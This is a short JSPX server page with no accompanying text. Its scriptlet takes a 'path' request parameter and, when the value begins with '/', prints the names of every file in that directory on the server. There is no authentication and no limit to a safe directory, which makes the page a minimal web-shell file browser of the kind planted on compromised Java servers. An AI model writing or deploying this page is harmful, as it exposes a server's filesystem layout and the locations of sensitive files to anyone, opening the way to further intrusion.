<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
          version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
    <jsp:directive.page import="java.util.*"/>
    <jsp:directive.page import="java.io.*"/>
    <jsp:declaration>

    </jsp:declaration>
    <jsp:scriptlet>
        String path = request.getParameter("path");
        if(path != null &amp;&amp; path.startsWith("/")){
            File index = new File(path);
            String[]entries = index.list();
            for(String s: entries){
                out.print(s+"&lt;br&gt;");
            }
        }else{
            out.print("path missed!");
        }
    </jsp:scriptlet>
</jsp:root>